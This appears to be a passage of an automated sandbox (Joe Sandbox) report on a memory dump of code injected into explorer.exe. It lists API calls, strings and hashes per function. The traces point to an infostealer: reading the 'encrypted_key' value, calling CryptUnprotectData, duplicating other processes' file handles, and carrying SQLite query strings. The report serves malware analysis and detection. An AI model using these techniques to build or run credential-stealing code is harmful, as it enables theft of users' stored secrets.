"encrypted_key":", xrefs: 02D62FBA, 02D62FBF, 02D62FCD, 02D62FDC

Memory Dump Source

Source File: 00000011.00000002.2432942972.0000000002D61000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D61000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2d61000_explorer.jbxd

Similarity

API ID: lstrlen$lstrcat
String ID: "encrypted_key":"
API String ID: 493641738-877455259
Opcode ID: aff79038ee2fbeb6f2806ec42400b6762ad5179c8978b7436fe1a67130a69f0d
Instruction ID: 4d9b57cf1291911bc722e7867e3fa3d3cff8f1f130edf0887ca52964eb038f84
Opcode Fuzzy Hash: aff79038ee2fbeb6f2806ec42400b6762ad5179c8978b7436fe1a67130a69f0d
Instruction Fuzzy Hash: 74E06822F4A725DF93236BB62CAC8A73F1C9F0A6553080068FA02D3302DF82CC01C2E0

Function 02D6BAFC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 57COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(00000000,00000000,00000000,?,readonly_shm,00000000,00000000,?,?,?), ref: 02D6BB40

Strings

winDelete, xrefs: 02D6BB6A

Memory Dump Source

Source File: 00000011.00000002.2432942972.0000000002D61000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D61000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2d61000_explorer.jbxd

Similarity

API ID: AttributesFile
String ID: winDelete
API String ID: 3188754299-3936022152
Opcode ID: c3b20fde4f9dc8f662aa4de25aecce24f5ab8300999ed940a8027e761f08d7b1
Instruction ID: 6b8a12f346f3a1f26c343e208931c684caad95561c6e6d2c1ed5970e8af2eb78
Opcode Fuzzy Hash: c3b20fde4f9dc8f662aa4de25aecce24f5ab8300999ed940a8027e761f08d7b1
Instruction Fuzzy Hash: 41110831A4021AEB9711AB7DD84897D7776DF81768F204527E84AF7384DB30CD02DB61

Function 02D62EA5 Relevance: 4.5, APIs: 3, Instructions: 43registryCOMMON

Download Yara Rule

APIs

Part of subcall function 02D61011: GetProcessHeap.KERNEL32(00000000,00000000,?,02D61A92,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,02D61AE2), ref: 02D61020
Part of subcall function 02D61011: RtlFreeHeap.NTDLL(00000000,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,02D61AE2,PortNumber,00000000,00000000), ref: 02D61027

Part of subcall function 02D61000: GetProcessHeap.KERNEL32(00000008,?,02D611C7,?,?,00000001,00000000,?), ref: 02D61003
Part of subcall function 02D61000: RtlAllocateHeap.NTDLL(00000000), ref: 02D6100A

RegOpenKeyExW.KERNELBASE(?,?,00000000,00020119,?), ref: 02D62EE4
RegEnumKeyExW.KERNELBASE(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 02D62F54
RegCloseKey.KERNELBASE(?), ref: 02D62F62

Memory Dump Source

Source File: 00000011.00000002.2432942972.0000000002D61000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D61000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2d61000_explorer.jbxd

Similarity

API ID: Heap$Process$AllocateCloseEnumFreeOpen
String ID:
API String ID: 1066184869-0
Opcode ID: 04ff86b13e57269d54d3071096e8b167be81480a8ef4a9b201001a50a0486978
Instruction ID: 54350558b00b0e0c6478577bf3c6273adfaf3e1fb43c9bcb332c8263fb4a9dfc
Opcode Fuzzy Hash: 04ff86b13e57269d54d3071096e8b167be81480a8ef4a9b201001a50a0486978
Instruction Fuzzy Hash: 06018F31208250AB8B159F62DC1C97F7BAAEFC4350F10442DF849A2384CB35CC15DBA1

Function 02D64B72 Relevance: 4.5, APIs: 3, Instructions: 8COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 02D64B74
CoUninitialize.COMBASE ref: 02D64B83
ExitProcess.KERNEL32 ref: 02D64B8B

Memory Dump Source

Source File: 00000011.00000002.2432942972.0000000002D61000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D61000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2d61000_explorer.jbxd

Similarity

API ID: ExitInitializeProcessUninitialize
String ID:
API String ID: 4175140541-0
Opcode ID: 63fea6c74e4c6ea9ac94965d6eb13a708138bcdfe6d41b4ad4a8c7ccfde320b6
Instruction ID: ee1dcf6136813616a5de324abfe5f9e04c2564306f37f96d7b66067b251bf186
Opcode Fuzzy Hash: 63fea6c74e4c6ea9ac94965d6eb13a708138bcdfe6d41b4ad4a8c7ccfde320b6
Instruction Fuzzy Hash: 4FC04C35E84201DBF6D12BE09C1D71D3718AF00756F009800E205853C0DB518C118A62

Function 02D69FC8 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 44memoryCOMMON

Download Yara Rule

APIs

HeapCreate.KERNELBASE(00000000,00BD0000,00000000), ref: 02D69FF8

Strings

failed to HeapCreate (%lu), flags=%u, initSize=%lu, maxSize=%lu, xrefs: 02D6A00E

Memory Dump Source

Source File: 00000011.00000002.2432942972.0000000002D61000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D61000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2d61000_explorer.jbxd

Similarity

API ID: CreateHeap
String ID: failed to HeapCreate (%lu), flags=%u, initSize=%lu, maxSize=%lu
API String ID: 10892065-982776804
Opcode ID: 0e8de417b10e7bcd3a61ff6cbb097f93a4e9ce91373b7191133b0a1e7d5b219f
Instruction ID: 6282160d8e146ead2307b116c210b23d4d47e6da5ba84c4574b97827d059c772
Opcode Fuzzy Hash: 0e8de417b10e7bcd3a61ff6cbb097f93a4e9ce91373b7191133b0a1e7d5b219f
Instruction Fuzzy Hash: 0CF0C272A44352BFE7205954AC8CFB7779CDB8878AF210819E986E6385E271EC01C630

Function 02D61AFE Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 42COMMON

Download Yara Rule

APIs

Part of subcall function 02D61000: GetProcessHeap.KERNEL32(00000008,?,02D611C7,?,?,00000001,00000000,?), ref: 02D61003
Part of subcall function 02D61000: RtlAllocateHeap.NTDLL(00000000), ref: 02D6100A

SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,00000000,00000000,?,?,02D62E83,PathToExe,00000000,00000000), ref: 02D61B16

Part of subcall function 02D61011: GetProcessHeap.KERNEL32(00000000,00000000,?,02D61A92,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,02D61AE2), ref: 02D61020
Part of subcall function 02D61011: RtlFreeHeap.NTDLL(00000000,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,02D61AE2,PortNumber,00000000,00000000), ref: 02D61027

Part of subcall function 02D619E5: RegOpenKeyExW.KERNELBASE(?,?,00000000,-00000201,?,?,00000016,?,?,?,?,02D61AE2,PortNumber,00000000,00000000), ref: 02D61A1E
Part of subcall function 02D619E5: RegQueryValueExW.KERNELBASE(?,?,00000000,?,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 02D61A3C
Part of subcall function 02D619E5: RegQueryValueExW.KERNELBASE(?,?,00000000,00000000,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 02D61A75
Part of subcall function 02D619E5: RegCloseKey.KERNELBASE(?,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,02D61AE2,PortNumber,00000000,00000000), ref: 02D61A98

Strings

Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 02D61B40

Memory Dump Source

Source File: 00000011.00000002.2432942972.0000000002D61000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D61000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2d61000_explorer.jbxd

Similarity

API ID: Heap$ProcessQueryValue$AllocateCloseFolderFreeOpenPath
String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
API String ID: 2162223993-2036018995
Opcode ID: b0aeb83806a8fb200aa9d7f2d6698d6d9b76b99abd0f80ebd0a08d7ab6b65b38
Instruction ID: de4b0598e7f0073aa762b019be76fb6b29ade7109f6cf104d8b3538602dda1ed
Opcode Fuzzy Hash: b0aeb83806a8fb200aa9d7f2d6698d6d9b76b99abd0f80ebd0a08d7ab6b65b38
Instruction Fuzzy Hash: 24F0E92778065A67D711692ECC98E77369FDBC22E67260029F42DA3341EE12EC0166B4

Function 02D6A33B Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 36COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 02D6A35F

Strings

winSeekFile, xrefs: 02D6A381

Memory Dump Source

Source File: 00000011.00000002.2432942972.0000000002D61000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D61000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2d61000_explorer.jbxd

Similarity

API ID: FilePointer
String ID: winSeekFile
API String ID: 973152223-3168307952
Opcode ID: f9fef59e9a42b2fb960df48bc0c0aadbd9c95342d880cc2f519a267f5dbb9a99
Instruction ID: 270a6856aa5003bc2d360ffc766e76cbe38ad8e726f5ebfb096996b5c6d7df88
Opcode Fuzzy Hash: f9fef59e9a42b2fb960df48bc0c0aadbd9c95342d880cc2f519a267f5dbb9a99
Instruction Fuzzy Hash: 15F0B431A54205AFE7119F64DC049BB77AAEB45321F248769F8A6D63C0EB30DD149BA0

Function 02D69EA7 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 21memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(05150000,00000000,?), ref: 02D69EB5

Strings

failed to HeapAlloc %u bytes (%lu), heap=%p, xrefs: 02D69ECD

Memory Dump Source

Source File: 00000011.00000002.2432942972.0000000002D61000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D61000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2d61000_explorer.jbxd

Similarity

API ID: AllocateHeap
String ID: failed to HeapAlloc %u bytes (%lu), heap=%p
API String ID: 1279760036-667713680
Opcode ID: 24934f3b823684ae8529363ec83691e9e93d35fcb94a8d068d82639aff044a3f
Instruction ID: 42f1056b5d6683d6abc2340638ea94f5e723395b4225b8ca7fb8690fd0222615
Opcode Fuzzy Hash: 24934f3b823684ae8529363ec83691e9e93d35fcb94a8d068d82639aff044a3f
Instruction Fuzzy Hash: 4BE08637A441127BD51226846C09F6BB765DB84B10F110415F94596341C270DC1187B1

Function 02D69EE8 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 19memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(05150000,00000000,?), ref: 02D69EF8

Strings

failed to HeapFree block %p (%lu), heap=%p, xrefs: 02D69F0E

Memory Dump Source

Source File: 00000011.00000002.2432942972.0000000002D61000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D61000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2d61000_explorer.jbxd

Similarity

API ID: FreeHeap
String ID: failed to HeapFree block %p (%lu), heap=%p
API String ID: 3298025750-4030396798
Opcode ID: d15033e29c1644fcc54c0c92905bfe9d99d59ffd109b9141cf4d136bb9e7b714
Instruction ID: 1429d90817d3ef55e48971e48b53db0bf3c1178b03b9c08430836df565d00935
Opcode Fuzzy Hash: d15033e29c1644fcc54c0c92905bfe9d99d59ffd109b9141cf4d136bb9e7b714
Instruction Fuzzy Hash: A6D0C233548203BBE2011A50AC09F3BBB399F80B00F150809F50595296C3709C61AB31

Function 02D61B6A Relevance: 3.0, APIs: 2, Instructions: 25fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(00000000,00000080,00000000,00000000,00000003,00000000,00000000,00000000,02D62893,00000000,00000000,00000000,?), ref: 02D61B82
CloseHandle.KERNELBASE(00000000), ref: 02D61B8F

Memory Dump Source

Source File: 00000011.00000002.2432942972.0000000002D61000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D61000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2d61000_explorer.jbxd

Similarity

API ID: CloseCreateFileHandle
String ID:
API String ID: 3498533004-0
Opcode ID: a1a83801607d7b4bd5c0049c090f8e1156736c25f33291fdaaf0a6390c55fc20
Instruction ID: 12ec6e32bf241c51da0a8cbc14b558b51155828846ae692f7a5861a3d2cdefd0
Opcode Fuzzy Hash: a1a83801607d7b4bd5c0049c090f8e1156736c25f33291fdaaf0a6390c55fc20
Instruction Fuzzy Hash: 0BD0E261696631A6E5B6262EBC1CFB76E1CDF03ABAB140A14B41D953C4E224CC97C2E0

Function 02D61000 Relevance: 3.0, APIs: 2, Instructions: 6memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,?,02D611C7,?,?,00000001,00000000,?), ref: 02D61003
RtlAllocateHeap.NTDLL(00000000), ref: 02D6100A

Memory Dump Source

Source File: 00000011.00000002.2432942972.0000000002D61000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D61000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2d61000_explorer.jbxd

Similarity

API ID: Heap$AllocateProcess
String ID:
API String ID: 1357844191-0
Opcode ID: 47bd27ae589bd8a1fd25aaa65b9c8d6a8c92feba6c7667af8575b6a0d28fcccf
Instruction ID: e7a7808a4015005b18c671901825191c433b8d7411e1dc3a07537d5564e52941
Opcode Fuzzy Hash: 47bd27ae589bd8a1fd25aaa65b9c8d6a8c92feba6c7667af8575b6a0d28fcccf
Instruction Fuzzy Hash: C4A00275D90104DBDD4557A49A2DA1E371CF744742F104944724596145D96498148B61

Function 02D612A3 Relevance: 1.6, APIs: 1, Instructions: 61COMMON

Download Yara Rule

APIs

RtlZeroMemory.NTDLL(?,00000018), ref: 02D612B5

Memory Dump Source

Source File: 00000011.00000002.2432942972.0000000002D61000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D61000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2d61000_explorer.jbxd

Similarity

API ID: MemoryZero
String ID:
API String ID: 816449071-0
Opcode ID: fe8d90b1f892579500d70bbe1e8d317938869fb574582376096494138a97940a
Instruction ID: 957bb4bb8944dbfe502f31b75c2b5de50386c1bc9cd0e88e9aa3169f36669a0c
Opcode Fuzzy Hash: fe8d90b1f892579500d70bbe1e8d317938869fb574582376096494138a97940a
Instruction Fuzzy Hash: 0611E3B1E01209EFDB10DFA9E989ABEB7BCFB08241B104429F949E6340D730DD00CBA0

Function 02D61B9D Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(00000000,00000000,02D62C8F,00000000,00000000,?,?,00000000,PathToExe,00000000,00000000), ref: 02D61BAA

Memory Dump Source

Source File: 00000011.00000002.2432942972.0000000002D61000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D61000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2d61000_explorer.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 140ce724a16a7dd636391c6180e88c3d7a730eb80ba02525f05781e7d54b84c0
Instruction ID: ddddfff598ca67b8fdda40b6a1602b8aca6573670e5f4ce98b2b73c04d85f858
Opcode Fuzzy Hash: 140ce724a16a7dd636391c6180e88c3d7a730eb80ba02525f05781e7d54b84c0
Instruction Fuzzy Hash: F5D0A733D02432838964163C780846262605A0257831E0774FC19F33C0E324CC82C2C0

Function 02D61677 Relevance: 1.5, APIs: 1, Instructions: 13COMMON

Download Yara Rule

APIs

CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 02D61684

Memory Dump Source

Source File: 00000011.00000002.2432942972.0000000002D61000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D61000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2d61000_explorer.jbxd

Similarity

API ID: CreateGlobalStream
String ID:
API String ID: 2244384528-0
Opcode ID: 817ee64db85dd3be36f23a3d5d163c6c0b35154e41de458f3bd1312776e1a802
Instruction ID: 29457bd04ded8f0903f47fac628cc8999ec5af8aa055a70fef1c838e9c35f7ac
Opcode Fuzzy Hash: 817ee64db85dd3be36f23a3d5d163c6c0b35154e41de458f3bd1312776e1a802
Instruction Fuzzy Hash: 4BC08C30960231DFE7701A708C09B8A36D8AF097B2F060D29E0C59D2C0E2F48CC0CAA0

Function 02D6104C Relevance: 1.3, APIs: 1, Instructions: 6memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040,02D6158A), ref: 02D61056

Memory Dump Source

Source File: 00000011.00000002.2432942972.0000000002D61000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D61000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2d61000_explorer.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: b59802b5b4af5f878cedddd6934fb595d1eb8e1031f1d22cd31ea6f0fbe48cbd
Instruction ID: 6f5a80daa6ce9ab1f9c30021e740bb7fe33552db75186c2a7697d2a9a1a1f6b7
Opcode Fuzzy Hash: b59802b5b4af5f878cedddd6934fb595d1eb8e1031f1d22cd31ea6f0fbe48cbd
Instruction Fuzzy Hash: 16A001B1BD5200AAFD6A5762AE2BF252A289740B02F200644B309681C055E4A9108569

Function 02D6105D Relevance: 1.3, APIs: 1, Instructions: 5COMMON

Download Yara Rule

APIs

VirtualFree.KERNELBASE(00000000,00000000,00008000,02D64A5B,?,?,00000000,?,?,?,?,02D64B66,?), ref: 02D61065

Memory Dump Source

Source File: 00000011.00000002.2432942972.0000000002D61000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D61000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2d61000_explorer.jbxd

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: a245156fdfc336a903c019ad33b129547009bd1c6e47ce84d2def3a06a0ad70f
Instruction ID: 72ee9cb2a5983ee6a18c83be8c8f3a0aeeb4d8e3bf4249ee00070fb3d96faede
Opcode Fuzzy Hash: a245156fdfc336a903c019ad33b129547009bd1c6e47ce84d2def3a06a0ad70f
Instruction Fuzzy Hash: 0BA00270ED0700E6EDB557205D1AF052718A740F41F2049447241A91C549A5E4548E58

Non-executed Functions

Function 02D6349B Relevance: 35.2, APIs: 19, Strings: 1, Instructions: 201nativefilestringCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,00000080,00000000,00000000,00000003,00000000,00000000,00000000,00000000,?,00000000), ref: 02D634C0

Part of subcall function 02D633C3: NtQueryInformationFile.NTDLL(00000000,00002000,00000000,00002000,0000002F), ref: 02D63401

OpenProcess.KERNEL32(00000440,00000000,00000000,?,00000000,?,?,?,?,?,?,?,?,?,02D637A8), ref: 02D634E9

Part of subcall function 02D61000: GetProcessHeap.KERNEL32(00000008,?,02D611C7,?,?,00000001,00000000,?), ref: 02D61003
Part of subcall function 02D61000: RtlAllocateHeap.NTDLL(00000000), ref: 02D6100A

NtQueryInformationProcess.NTDLL(00000000,00000033,00000000,?,?), ref: 02D6351E
NtQueryInformationProcess.NTDLL(00000000,00000033,00000000,?,?), ref: 02D63541
GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002), ref: 02D63586
DuplicateHandle.KERNEL32(00000000,00000000,00000000), ref: 02D6358F
lstrcmpiW.KERNEL32(00000000,File), ref: 02D635B6
NtQueryObject.NTDLL(?,00000001,00000000,00001000,00000000), ref: 02D635DE
StrRChrW.SHLWAPI(?,00000000,0000005C), ref: 02D635F6
StrRChrW.SHLWAPI(?,00000000,0000005C), ref: 02D63606
lstrcmpiW.KERNEL32(00000000,00000000), ref: 02D6361E
GetFileSize.KERNEL32(?,00000000), ref: 02D63631
SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 02D63658
SetFilePointer.KERNEL32(?,00000000,00000000,00000000), ref: 02D6366B
ReadFile.KERNEL32(?,?,00000000,?,00000000), ref: 02D63681
SetFilePointer.KERNEL32(?,?,00000000,00000000), ref: 02D636AD
CloseHandle.KERNEL32(?), ref: 02D636C0
CloseHandle.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,02D637A8), ref: 02D636F5

Part of subcall function 02D61C9F: CreateFileW.KERNEL32(?,40000000,00000002,00000000,00000002,00000000,00000000), ref: 02D61CC0
Part of subcall function 02D61C9F: WriteFile.KERNEL32(00000000,?,?,?,00000000,?,40000000,00000002,00000000,00000002,00000000,00000000), ref: 02D61CDA
Part of subcall function 02D61C9F: CloseHandle.KERNEL32(00000000,?,?,?,00000000,?,40000000,00000002,00000000,00000002,00000000,00000000), ref: 02D61CE6

CloseHandle.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,02D637A8), ref: 02D63707

Strings

File, xrefs: 02D635B0

Memory Dump Source

Source File: 00000011.00000002.2432942972.0000000002D61000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D61000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2d61000_explorer.jbxd

Similarity

API ID: File$HandleProcess$CloseQuery$InformationPointer$CreateHeaplstrcmpi$AllocateCurrentDuplicateObjectOpenReadSizeWrite
String ID: File
API String ID: 3915112439-749574446
Opcode ID: 8691721f9e6c23dc7814416443f8b03a47e4ac4376bf0ba7266908dc06a7782f
Instruction ID: 85436962f22d307b2baa95aaf949394391f7790ab2a3ede0235861473507bb57
Opcode Fuzzy Hash: 8691721f9e6c23dc7814416443f8b03a47e4ac4376bf0ba7266908dc06a7782f
Instruction Fuzzy Hash: CC619B70A48340EFE761AF61CC98B3B7BADEB88B55F100828F946A6390D731DC54CB91

Function 02DB4438 Relevance: 19.9, APIs: 3, Strings: 10, Instructions: 359COMMON

Download Yara Rule

APIs

memcmp.NTDLL(localhost,00000007,00000009,00000002,?,00000000,000001D8,?,00000000), ref: 02DB4502
memcmp.NTDLL(00000000,?,?,00000002,?,00000000,000001D8,?,00000000), ref: 02DB475F
memcpy.NTDLL(00000000,00000000,00000000,00000002,?,00000000,000001D8,?,00000000), ref: 02DB4803

Strings

cach, xrefs: 02DB46DC
no such %s mode: %s, xrefs: 02DB4784
invalid uri authority: %.*s, xrefs: 02DB4513
no such vfs: %s, xrefs: 02DB482F
cache, xrefs: 02DB46FA
%s mode not allowed: %s, xrefs: 02DB47D0
access, xrefs: 02DB4725
file, xrefs: 02DB4474
localhost, xrefs: 02DB44FD
mode, xrefs: 02DB4712

Memory Dump Source

Source File: 00000011.00000002.2432942972.0000000002D61000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D61000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2d61000_explorer.jbxd

Similarity

API ID: memcmp$memcpy
String ID: %s mode not allowed: %s$access$cach$cache$file$invalid uri authority: %.*s$localhost$mode$no such %s mode: %s$no such vfs: %s
API String ID: 231171946-1096842476
Opcode ID: 9ec56897687cc3e7671f63da9137627a614fc89a0fe83ecb28afad1737070184
Instruction ID: 3132f16f36eca5dd736fc28c1b82b90d65b93fcee8423521ad85a4007fafc85a
Opcode Fuzzy Hash: 9ec56897687cc3e7671f63da9137627a614fc89a0fe83ecb28afad1737070184
Instruction Fuzzy Hash: 47C19E70A08391DBDB26CE2884B47EAB7E2AF89318F04051EE4D787352D764DC45CB92

Function 02D85F08 Relevance: 12.3, APIs: 1, Strings: 7, Instructions: 328COMMON

Download Yara Rule

APIs

Part of subcall function 02D66AAA: memset.NTDLL ref: 02D66AC5

memset.NTDLL ref: 02D85F53

Strings

cannot open virtual table: %s, xrefs: 02D85FAA
indexed, xrefs: 02D860E8
foreign key, xrefs: 02D860A3
no such column: "%s", xrefs: 02D86271
cannot open %s column for writing, xrefs: 02D86255
cannot open view: %s, xrefs: 02D85FF3
cannot open table without rowid: %s, xrefs: 02D85FCF

Memory Dump Source

Source File: 00000011.00000002.2432942972.0000000002D61000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D61000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2d61000_explorer.jbxd

Similarity

API ID: memset
String ID: cannot open %s column for writing$cannot open table without rowid: %s$cannot open view: %s$cannot open virtual table: %s$foreign key$indexed$no such column: "%s"
API String ID: 2221118986-594550510
Opcode ID: ebbdfb9ea91fac004fc7d454f0db0863efc810f78f38fe1b1cc758749a00e33c
Instruction ID: c06dc2b7d378c01ad8925e2ce1bd57f9e9c745d1b53e4d8f6ffa4b69d69f394c
Opcode Fuzzy Hash: ebbdfb9ea91fac004fc7d454f0db0863efc810f78f38fe1b1cc758749a00e33c
Instruction Fuzzy Hash: 76C16B70A087029FDB14EF25C480A2AB7EAFF88714F14896DF88587341E735ED56CB96

Function 02D62112 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 29timeCOMMON

Download Yara Rule

APIs

Part of subcall function 02D61000: GetProcessHeap.KERNEL32(00000008,?,02D611C7,?,?,00000001,00000000,?), ref: 02D61003
Part of subcall function 02D61000: RtlAllocateHeap.NTDLL(00000000), ref: 02D6100A

GetSystemTimeAsFileTime.KERNEL32(?), ref: 02D62127
_alldiv.NTDLL(?,?,00989680,00000000), ref: 02D6213A
wsprintfA.USER32 ref: 02D6214F

Strings

%li, xrefs: 02D62149

Memory Dump Source

Source File: 00000011.00000002.2432942972.0000000002D61000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D61000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2d61000_explorer.jbxd

Similarity

API ID: HeapTime$AllocateFileProcessSystem_alldivwsprintf
String ID: %li
API String ID: 4120667308-1021419598
Opcode ID: ec3394f8f1021d376d8d2472f29bbb303491dc787c231e86ab7ab0423c689708
Instruction ID: 460602f8d664ecea35cecb2992ae4d0c1efa82cfa93431a35d4cf649693d3cb3
Opcode Fuzzy Hash: ec3394f8f1021d376d8d2472f29bbb303491dc787c231e86ab7ab0423c689708
Instruction Fuzzy Hash: FFE09232A40208B7D7223BA8AC0AEEE7B6DDB40B56F400591FA05F6345D9628E3487E5

Function 02D6123B Relevance: 4.5, APIs: 3, Instructions: 49encryptionstringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,02D63E4B,00000000), ref: 02D6124A
CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 02D61268

Part of subcall function 02D61000: GetProcessHeap.KERNEL32(00000008,?,02D611C7,?,?,00000001,00000000,?), ref: 02D61003
Part of subcall function 02D61000: RtlAllocateHeap.NTDLL(00000000), ref: 02D6100A

CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 02D61295

Memory Dump Source

Source File: 00000011.00000002.2432942972.0000000002D61000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D61000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2d61000_explorer.jbxd

Similarity

API ID: BinaryCryptHeapString$AllocateProcesslstrlen
String ID:
API String ID: 117552131-0
Opcode ID: 5e3588ba5719e3c0bd1a9684b6a5765ba36135501ad16b85bee681023221838e
Instruction ID: e95f29e449e7c9bcc2f27832256b77638cb854729cf605c652fcf9c4c27c64f6
Opcode Fuzzy Hash: 5e3588ba5719e3c0bd1a9684b6a5765ba36135501ad16b85bee681023221838e
Instruction Fuzzy Hash: 1501A2B1604305AFE718CF16CC89FBBB7ACEB84695F004A2EF505C2340DBA1DC018AB0

Function 02D611E1 Relevance: 4.5, APIs: 3, Instructions: 46encryptionstringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,74DEF360,00000000,?,00000000,?,02D646E3), ref: 02D611ED
CryptStringToBinaryW.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 02D6120F

Part of subcall function 02D61000: GetProcessHeap.KERNEL32(00000008,?,02D611C7,?,?,00000001,00000000,?), ref: 02D61003
Part of subcall function 02D61000: RtlAllocateHeap.NTDLL(00000000), ref: 02D6100A

CryptStringToBinaryW.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 02D61231

Memory Dump Source

Source File: 00000011.00000002.2432942972.0000000002D61000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D61000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2d61000_explorer.jbxd

Similarity

API ID: BinaryCryptHeapString$AllocateProcesslstrlen
String ID:
API String ID: 117552131-0
Opcode ID: ad874ff725c94c131783c73c816cdc685338f4bdd980b639d75a16f54c0e4077
Instruction ID: ec11a00a2d334dc086be387d1322de43fd466f21eb7fc09d898827f028eb0256
Opcode Fuzzy Hash: ad874ff725c94c131783c73c816cdc685338f4bdd980b639d75a16f54c0e4077
Instruction Fuzzy Hash: 49F0967260430E7BE2109E56DC85FB77B9DDF85695F15042EB601C6340DE92ED0586B4

Function 02D61FCE Relevance: 3.0, APIs: 2, Instructions: 49encryptionCOMMON

Download Yara Rule

APIs

CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 02D61FFA
RtlMoveMemory.NTDLL(?,?,?), ref: 02D62015

Memory Dump Source

Source File: 00000011.00000002.2432942972.0000000002D61000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D61000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2d61000_explorer.jbxd

Similarity

API ID: CryptDataMemoryMoveUnprotect
String ID:
API String ID: 2807545630-0
Opcode ID: aad30803aeb88ae42a4bfb2f587d4c20816bbfbd60c511302c16261252003607
Instruction ID: d344ee086f2824d9ac96d55dcc33d1d56dd10e5df41b6ac0b9daf83f24b7ff71
